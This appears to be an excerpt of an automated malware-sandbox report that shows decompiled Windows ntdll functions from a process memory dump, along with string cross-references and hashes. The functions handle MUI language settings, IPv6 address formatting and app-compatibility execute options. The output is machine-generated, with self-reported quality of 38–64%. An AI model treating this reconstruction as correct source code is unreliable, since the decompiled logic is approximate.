				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00908460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0090718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00908460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0090718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00908460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00908460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00908460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0090718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008E2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008FE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008EE2A8(_t322,  &_v68, _v16);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008FE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008EE2A8(_t322,  &_v68, _t236);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0090718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008E2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008FE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008EE2A8(_v12,  &_v68, _v16);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008FE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008EE2A8(_t322,  &_v68, _t269);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
                                                                                                                                                        						if(_v8 != _t318) {
                                                                                                                                                        							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _t318;
                                                                                                                                                        						goto L30;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				_t284 = _v24;
                                                                                                                                                        				_t322 = _t284 + 4;
                                                                                                                                                        				_push(_t284);
                                                                                                                                                        				_v48 = _t322;
                                                                                                                                                        				E0090718A(_t284);
                                                                                                                                                        				_t339 = _t335 + 4;
                                                                                                                                                        				if(_t322 == _t318) {
                                                                                                                                                        					_v28 = _t318;
                                                                                                                                                        				} else {
                                                                                                                                                        					_v28 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 == _t318) {
                                                                                                                                                        					_v48 = _t318;
                                                                                                                                                        					goto L58;
                                                                                                                                                        				} else {
                                                                                                                                                        					E008E2340(_v28, _v8, _v24);
                                                                                                                                                        					_v16 = _v28;
                                                                                                                                                        					_a4 = _t318;
                                                                                                                                                        					_t288 = E008FE679(_v28, _t332);
                                                                                                                                                        					_t335 = _t339 + 0x14;
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_v12 = _t288;
                                                                                                                                                        						if(_t288 == _t318) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_v12 = _v12 + 2;
                                                                                                                                                        						 *_v12 = 0;
                                                                                                                                                        						E008EE2A8(_v12,  &_v68, _v16);
                                                                                                                                                        						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        						_v16 = _v12;
                                                                                                                                                        						_t288 = E008FE679(_v12, _t332);
                                                                                                                                                        						_pop(_t322);
                                                                                                                                                        					}
                                                                                                                                                        					_t296 = _v16;
                                                                                                                                                        					if( *_v16 != _t318) {
                                                                                                                                                        						E008EE2A8(_t322,  &_v68, _t296);
                                                                                                                                                        						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(_a4 == _t318) {
                                                                                                                                                        						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                        						_v48 = _t318;
                                                                                                                                                        						_v28 = _t318;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v8 != _t318) {
                                                                                                                                                        						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					goto L17;
                                                                                                                                                        				}
                                                                                                                                                        			}





































                                                                                                                                                        0x00908940
                                                                                                                                                        0x00908954
                                                                                                                                                        0x00908954
                                                                                                                                                        0x0090895a
                                                                                                                                                        0x00951b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908960
                                                                                                                                                        0x00908969
                                                                                                                                                        0x00908973
                                                                                                                                                        0x00908976
                                                                                                                                                        0x00908979
                                                                                                                                                        0x0090897e
                                                                                                                                                        0x00908981
                                                                                                                                                        0x00908981
                                                                                                                                                        0x00908986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00951b6e
                                                                                                                                                        0x00951b74
                                                                                                                                                        0x00951b7b
                                                                                                                                                        0x00951b8f
                                                                                                                                                        0x00951b91
                                                                                                                                                        0x00951b91
                                                                                                                                                        0x00951b99
                                                                                                                                                        0x00951b9c
                                                                                                                                                        0x00951ba2
                                                                                                                                                        0x00951ba2
                                                                                                                                                        0x0090898c
                                                                                                                                                        0x00908992
                                                                                                                                                        0x00908999
                                                                                                                                                        0x009089ad
                                                                                                                                                        0x00951ba8
                                                                                                                                                        0x00951ba8
                                                                                                                                                        0x009089ad
                                                                                                                                                        0x009089b6
                                                                                                                                                        0x009089c8
                                                                                                                                                        0x009089cd
                                                                                                                                                        0x009089d0
                                                                                                                                                        0x009089d0
                                                                                                                                                        0x009089d6
                                                                                                                                                        0x009089e8
                                                                                                                                                        0x009089e8
                                                                                                                                                        0x009089ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009089ed
                                                                                                                                                        0x0090895a
                                                                                                                                                        0x0090883e
                                                                                                                                                        0x00908841
                                                                                                                                                        0x00908844
                                                                                                                                                        0x00908845
                                                                                                                                                        0x00908848
                                                                                                                                                        0x0090884d
                                                                                                                                                        0x00908852
                                                                                                                                                        0x00908b49
                                                                                                                                                        0x00908858
                                                                                                                                                        0x0090886c
                                                                                                                                                        0x0090886c
                                                                                                                                                        0x00908872
                                                                                                                                                        0x00951b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908878
                                                                                                                                                        0x00908881
                                                                                                                                                        0x0090888b
                                                                                                                                                        0x0090888e
                                                                                                                                                        0x00908891
                                                                                                                                                        0x00908896
                                                                                                                                                        0x00908899
                                                                                                                                                        0x00908899
                                                                                                                                                        0x0090889e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00951b21
                                                                                                                                                        0x00951b27
                                                                                                                                                        0x00951b2e
                                                                                                                                                        0x00951b42
                                                                                                                                                        0x00951b44
                                                                                                                                                        0x00951b44
                                                                                                                                                        0x00951b4c
                                                                                                                                                        0x00951b4f
                                                                                                                                                        0x00951b55
                                                                                                                                                        0x00951b55
                                                                                                                                                        0x009088a4
                                                                                                                                                        0x009088aa
                                                                                                                                                        0x009088b1
                                                                                                                                                        0x009088c5
                                                                                                                                                        0x00951b5b
                                                                                                                                                        0x00951b5b
                                                                                                                                                        0x009088c5
                                                                                                                                                        0x009088ce
                                                                                                                                                        0x009088e0
                                                                                                                                                        0x009088e5
                                                                                                                                                        0x009088e8
                                                                                                                                                        0x009088e8
                                                                                                                                                        0x009088ee
                                                                                                                                                        0x00908900
                                                                                                                                                        0x00908900
                                                                                                                                                        0x00908905
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00908905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00908827
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 009087E6
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 009089FC
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 009087C1
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00908914
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                                                                                                                        • Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
                                                                                                                                                        • Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                                                                                                                                                        • Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E009213CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                        				char _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                        				signed int _t78;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				char _t90;
                                                                                                                                                        				signed int _t91;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                        				signed int _t114;
                                                                                                                                                        				void* _t115;
                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        
                                                                                                                                                        				_t129 = _a4;
                                                                                                                                                        				_t128 = _a8;
                                                                                                                                                        				_t116 = 0;
                                                                                                                                                        				_t71 = _t128 + 0x5c;
                                                                                                                                                        				_v8 = 8;
                                                                                                                                                        				_v20 = _t71;
                                                                                                                                                        				if( *_t129 == 0) {
                                                                                                                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                        						goto L5;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                        						if(_t96 != 0) {
                                                                                                                                                        							L38:
                                                                                                                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        								L36:
                                                                                                                                                        								return _t128 + _t86 * 2;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                        						if(_t114 == 0) {
                                                                                                                                                        							L33:
                                                                                                                                                        							_t115 = 0x8e2926;
                                                                                                                                                        							L35:
                                                                                                                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        							_t86 = E00917707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                        							goto L36;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0xffff) {
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L38;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                        							_t115 = 0x8e9cac;
                                                                                                                                                        							goto L35;
                                                                                                                                                        						}
                                                                                                                                                        						goto L33;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L5:
                                                                                                                                                        					_a8 = _t116;
                                                                                                                                                        					_a4 = _t116;
                                                                                                                                                        					_v12 = _t116;
                                                                                                                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                        							_v8 = 6;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t90 = _v8;
                                                                                                                                                        					if(_t90 <= _t116) {
                                                                                                                                                        						L11:
                                                                                                                                                        						if(_a8 - _a4 <= 1) {
                                                                                                                                                        							_a8 = _t116;
                                                                                                                                                        							_a4 = _t116;
                                                                                                                                                        						}
                                                                                                                                                        						_t91 = 0;
                                                                                                                                                        						if(_v8 <= _t116) {
                                                                                                                                                        							L22:
                                                                                                                                                        							if(_v8 < 8) {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t128 = _t128 + E00917707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                        							}
                                                                                                                                                        							return _t128;
                                                                                                                                                        						} else {
                                                                                                                                                        							L14:
                                                                                                                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                        									_push(":");
                                                                                                                                                        									_push(_t71 - _t128 >> 1);
                                                                                                                                                        									_push(_t128);
                                                                                                                                                        									_t128 = _t128 + E00917707() * 2;
                                                                                                                                                        									_t71 = _v20;
                                                                                                                                                        									_t130 = _t130 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								_t78 = E00917707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                        								_t130 = _t130 + 0x10;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push(L"::");
                                                                                                                                                        								_push(_t71 - _t128 >> 1);
                                                                                                                                                        								_push(_t128);
                                                                                                                                                        								_t78 = E00917707();
                                                                                                                                                        								_t130 = _t130 + 0xc;
                                                                                                                                                        								_t91 = _a8 - 1;
                                                                                                                                                        							}
                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                        							_t128 = _t128 + _t78 * 2;
                                                                                                                                                        							_t71 = _v20;
                                                                                                                                                        							if(_t91 >= _v8) {
                                                                                                                                                        								goto L22;
                                                                                                                                                        							}
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L14;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						_t108 = 1;
                                                                                                                                                        						_v16 = _t129;
                                                                                                                                                        						_v24 = _t90;
                                                                                                                                                        						do {
                                                                                                                                                        							if( *_v16 == _t116) {
                                                                                                                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                        									_a4 = _v12;
                                                                                                                                                        									_a8 = _t108;
                                                                                                                                                        								}
                                                                                                                                                        								_t116 = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _t108;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v16 + 2;
                                                                                                                                                        							_t108 = _t108 + 1;
                                                                                                                                                        							_t26 =  &_v24;
                                                                                                                                                        							 *_t26 = _v24 - 1;
                                                                                                                                                        						} while ( *_t26 != 0);
                                                                                                                                                        						goto L11;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        			}




















                                                                                                                                                        0x009214a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009214a4
                                                                                                                                                        0x00921413
                                                                                                                                                        0x00921415
                                                                                                                                                        0x00921416
                                                                                                                                                        0x00921419
                                                                                                                                                        0x0092141c
                                                                                                                                                        0x00921422
                                                                                                                                                        0x009213b7
                                                                                                                                                        0x009213bc
                                                                                                                                                        0x009213bf
                                                                                                                                                        0x009213bf
                                                                                                                                                        0x009213c2
                                                                                                                                                        0x00921424
                                                                                                                                                        0x00921424
                                                                                                                                                        0x00921424
                                                                                                                                                        0x00921427
                                                                                                                                                        0x0092142b
                                                                                                                                                        0x0092142c
                                                                                                                                                        0x0092142c
                                                                                                                                                        0x0092142c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092141c
                                                                                                                                                        0x00921411

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                                                                                                                        • Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
                                                                                                                                                        • Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                                                                                                                                                        • Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E00917EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v540;
                                                                                                                                                        				unsigned int _v544;
                                                                                                                                                        				signed int _v548;
                                                                                                                                                        				intOrPtr _v552;
                                                                                                                                                        				char _v556;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t33;
                                                                                                                                                        				void* _t38;
                                                                                                                                                        				unsigned int _t46;
                                                                                                                                                        				unsigned int _t47;
                                                                                                                                                        				unsigned int _t52;
                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                        				unsigned int _t62;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				void* _t70;
                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                        				signed int _t73;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				void* _t76;
                                                                                                                                                        				void* _t77;
                                                                                                                                                        
                                                                                                                                                        				_t33 =  *0x9c2088; // 0x77777575
                                                                                                                                                        				_v8 = _t33 ^ _t73;
                                                                                                                                                        				_v548 = _v548 & 0x00000000;
                                                                                                                                                        				_t72 = _a4;
                                                                                                                                                        				if(E00917F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                        					__eflags = _v548;
                                                                                                                                                        					if(_v548 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t62 = _t72 + 0x24;
                                                                                                                                                        					E00933F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                        					_t71 = 0x214;
                                                                                                                                                        					_v544 = 0x214;
                                                                                                                                                        					E008EDFC0( &_v540, 0, 0x214);
                                                                                                                                                        					_t75 = _t74 + 0x20;
                                                                                                                                                        					_t46 =  *0x9c4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                        					__eflags = _t46;
                                                                                                                                                        					if(_t46 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t47 = _v544;
                                                                                                                                                        					__eflags = _t47;
                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					__eflags = _t47 - 0x214;
                                                                                                                                                        					if(_t47 >= 0x214) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                        					E00933F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                        					_t52 = E008F0D27( &_v540, L"Execute=1");
                                                                                                                                                        					_t76 = _t75 + 0x1c;
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					__eflags = _t52;
                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                        						E00933F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                        						_t71 =  &_v540;
                                                                                                                                                        						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                        						_t77 = _t76 + 0x14;
                                                                                                                                                        						_v552 = _t56;
                                                                                                                                                        						__eflags = _t71 - _t56;
                                                                                                                                                        						if(_t71 >= _t56) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							L10:
                                                                                                                                                        							_t62 = E008F8375(_t71, 0x20);
                                                                                                                                                        							_pop(_t69);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								 *_t62 = 0;
                                                                                                                                                        							}
                                                                                                                                                        							E00933F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                        							_t77 = _t77 + 0x10;
                                                                                                                                                        							E0095E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(_t62 == 0) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        							_t31 = _t62 + 2; // 0x2
                                                                                                                                                        							_t71 = _t31;
                                                                                                                                                        							__eflags = _t71 - _v552;
                                                                                                                                                        							if(_t71 >= _v552) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                        					_push(3);
                                                                                                                                                        					_push(0x55);
                                                                                                                                                        					E00933F92();
                                                                                                                                                        					_t38 = 1;
                                                                                                                                                        					L2:
                                                                                                                                                        					return E008EE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t38 = 0;
                                                                                                                                                        				goto L2;
                                                                                                                                                        			}




























                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00933F12
                                                                                                                                                        Strings
                                                                                                                                                        • Execute=1, xrefs: 00933F5E
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00933F4A
                                                                                                                                                        • ExecuteOptions, xrefs: 00933F04
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00933F75
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0093E345
